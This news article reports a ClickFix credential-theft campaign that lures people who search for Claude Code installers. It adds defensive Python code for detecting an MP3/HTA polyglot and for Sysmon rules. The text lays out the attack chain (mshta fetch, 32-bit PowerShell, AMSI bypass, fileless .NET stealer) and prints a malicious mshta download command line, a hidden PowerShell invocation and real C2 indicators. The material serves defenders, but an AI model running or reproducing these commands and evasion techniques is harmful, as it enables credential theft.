A new threat intelligence report by security research firm Cyderes has exposed an active credential theft campaign targeting first-time users of Anthropic’s Claude Code tool.
Shared with Hackread.com, the findings show how threat actors exploit the rapid adoption of AI coding tools to compromise small business owners, entrepreneurs, and teachers who lack enterprise-grade protections.
Cyderes’ research shows that the attack begins with SEO poisoning: when a user searches for how to install the software, they land on a spoofed Anthropic page. That page instructs them to open the Windows Run dialog (Win+R) and paste a command that launches mshta.exe. This is a classic ClickFix lure: because the victim types and runs the command themselves, execution starts from a hands-on-keyboard session, which sidesteps automated sandbox analysis that never sees the user-driven step.
When the command runs, mshta.exe retrieves a 6.7 MB MP3/HTA polyglot payload from download.version-516.com/claude. A polyglot is a single file that is valid in two formats at once: this one carries genuine audio tags and cover art so that file-type inspection classifies it as an MP3, while an HTA script block embedded further into the file is what mshta.exe actually parses and executes.
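To see why a magic-bytes check passes such a file while a content scan catches it, here is an added example (my code, not Cyderes’ or Hackread’s, and not the real payload): it builds a stand-in polyglot from an ID3v2 header, one fake MPEG frame and an inert HTA block, then runs both a naive file-type check and a full-body scan for HTA markers over it. The marker patterns and the sample bytes are constructed for illustration.

```python
import re

# Constructed sample: an ID3v2 header, one fake MPEG audio frame, then an HTA
# block. It stands in for the MP3/HTA polyglot the report describes; it is not
# the real payload and the script body does nothing.
def build_sample_polyglot() -> bytes:
    # ID3v2.3 header: "ID3", version 3.0, flags 0, syncsafe size 0x10 (16 bytes)
    id3_header = b"ID3\x03\x00\x00\x00\x00\x00\x10" + b"\x00" * 16
    # MPEG-1 Layer III frame sync (0xFFFB) followed by padding in place of audio
    audio_frame = b"\xff\xfb\x90\x00" + b"\x00" * 60
    hta_block = (
        b'<html><head><hta:application id="app" showintaskbar="no" windowstate="minimize"/></head>'
        b'<body><script language="VBScript">'
        b'Set sh = CreateObject("WScript.Shell")'
        b"</script></body></html>"
    )
    return id3_header + audio_frame + hta_block + b"\x00" * 32


def looks_like_mp3(data: bytes) -> bool:
    """The magic-bytes check a naive file-type inspector performs: ID3 tag or frame sync."""
    return data[:3] == b"ID3" or data[:2] in (b"\xff\xfb", b"\xff\xfa", b"\xff\xf3")


# Content markers that an MP3 has no business containing anywhere in its body.
HTA_MARKERS = (
    ("hta_application_tag", re.compile(rb"<hta:application\b", re.I)),
    ("script_tag", re.compile(rb"<script\b[^>]*>", re.I)),
    ("shell_object", re.compile(rb"\bwscript\.shell\b", re.I)),
)


def find_hta_markers(data: bytes) -> list[tuple[str, int]]:
    """Scan the whole file, not just the header; return (marker, offset) for each hit."""
    return [(name, m.start()) for name, pat in HTA_MARKERS if (m := pat.search(data))]


def classify(data: bytes) -> str:
    """Combine both checks: a file that passes as MP3 *and* carries HTA content is a polyglot."""
    is_mp3 = looks_like_mp3(data)
    markers = find_hta_markers(data)
    if is_mp3 and markers:
        return "mp3/hta polyglot"
    if markers:
        return "hta"
    if is_mp3:
        return "mp3"
    return "unknown"


if __name__ == "__main__":
    sample = build_sample_polyglot()
    print("magic check says MP3:", looks_like_mp3(sample))
    print("verdict:", classify(sample))
    for name, offset in find_hta_markers(sample):
        print(f"  {name} at byte offset {offset}")
```

The point of the example is the mismatch between the two checks: the header-only test happily reports an MP3, while the HTA markers all sit past the audio bytes, which is exactly where a magic-bytes inspector stops looking. Any scanner deployed against this lure has to read the body, not just the first few bytes.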
According to Cyderes’ blog post, the HTA script immediately sets up a hidden task that launches the 32-bit build of Windows PowerShell (the one shipped under SysWOW64) rather than the native 64-bit one. The researchers believe the attackers chose it deliberately because, in their assessment, many Endpoint Detection and Response (EDR) products concentrate their PowerShell monitoring on the 64-bit host.
Inside that PowerShell process, the loader first performs an AMSI bypass, a technique that disables the Antimalware Scan Interface, the Windows component through which security products inspect script content before it runs. It then decrypts its next stage with a hard-coded key (BWJFEesMEqRvjQbm) and derives a unique per-victim identifier from the machine’s computer name and username.
The final step reaches out to oakenfjrod.ru and downloads a 17 MB script. According to the researchers, the file was deliberately made this large to overwhelm automated analysis sandboxes and make them crash. The whole chain runs in memory; nothing is written to disk, which defeats file-based scanning and makes the attack much harder to spot.
A reflective .NET infostealer is embedded inside this Stage 3 script. By abusing the .NET Framework’s Assembly.Load(byte[]) method, the loader executes the stealer directly within the existing powershell.exe address space, so the attack stays fileless: the assembly never touches disk and never passes through a file scan.
The infostealer then reads the browser credential store and exfiltrates the saved data to a C2 server at 185.177.239.255:443, an address the researchers say is hosted on Russian infrastructure.
Cyderes’ research team has confirmed that Anthropic itself has not been compromised. The firm advises defenders to block DNS resolution for *.oakenfjrod.ru and to alert on any outbound network connection initiated by mshta.exe, so that individual workstations stay protected against this ongoing campaign.
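Turning the chain above and Cyderes’ two recommendations into concrete detections: the added example below (my code, not Cyderes’ or Hackread’s) runs four rules over constructed Sysmon-style events: mshta.exe launched with a remote URL, an outbound connection initiated by mshta.exe, the SysWOW64 (32-bit) PowerShell host spawned by mshta.exe, and a DNS query for anything under oakenfjrod.ru. The Sysmon field names (EventID, Image, ParentImage, CommandLine, Initiated, QueryName) are the standard ones; the sample command lines, IPs and the cdn. hostname are made up, and only the download.version-516.com host and the oakenfjrod.ru domain come from the report.

```python
import json

# Constructed Sysmon-style events (only the fields the rules need), modelled on
# the chain the report describes. Command lines, destination IPs and the "cdn."
# label are placeholders; the two domains are the ones named in the report.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://download.version-516.com/claude"},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c <stage2>"},
    {"EventID": 22, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "QueryName": "cdn.oakenfjrod.ru"},
    # Two benign events that must not fire: an admin's 64-bit PowerShell and a browser.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": "true", "DestinationIp": "198.51.100.5", "DestinationPort": 443},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

# Full path of the 32-bit PowerShell host on 64-bit Windows.
WOW64_POWERSHELL = r"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
# Loader/C2 domains to match, including every subdomain; extend with the C2 IP from the report.
C2_DOMAINS = ("oakenfjrod.ru",)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_domain(name: str, suffixes) -> bool:
    """True for the domain itself or any subdomain of it; never for look-alike prefixes."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in suffixes)


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule this single event triggers."""
    eid = event.get("EventID")
    image = event.get("Image", "").lower()
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Stage 0: mshta.exe started with a remote URL (the pasted ClickFix command)
    if eid == 1 and basename(image) == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("mshta_remote_url")
    # Cyderes' advice: any outbound connection initiated by mshta.exe
    if eid == 3 and basename(image) == "mshta.exe" and event.get("Initiated") == "true":
        hits.append("mshta_outbound_connection")
    # Stage 1: the 32-bit (SysWOW64) PowerShell host spawned by mshta.exe
    if eid == 1 and image == WOW64_POWERSHELL and parent == "mshta.exe":
        hits.append("wow64_powershell_from_mshta")
    # Stage 3: DNS lookup of the loader/C2 domain (Sysmon event 22)
    if eid == 22 and matches_domain(event.get("QueryName", ""), C2_DOMAINS):
        hits.append("dns_query_c2_domain")
    return hits


def scan(log_text: str) -> list[tuple[int, str]]:
    """Run every rule over newline-delimited JSON events; return (line, rule) pairs."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines()):
        if line.strip():
            alerts.extend((lineno, rule) for rule in evaluate(json.loads(line)))
    return alerts


if __name__ == "__main__":
    for lineno, rule in scan(SAMPLE_LOG):
        print(f"line {lineno}: {rule}")
```

Two design notes. The 32-bit rule matches on the full SysWOW64 path rather than on the process name, because the binary name is identical to the 64-bit host and that is precisely what the attackers are counting on. The domain rule anchors on a leading dot so that a look-alike such as notoakenfjrod.ru does not match, while any real subdomain does; the same predicate can be reused in a DNS-blocking layer, which is the firm’s first recommendation.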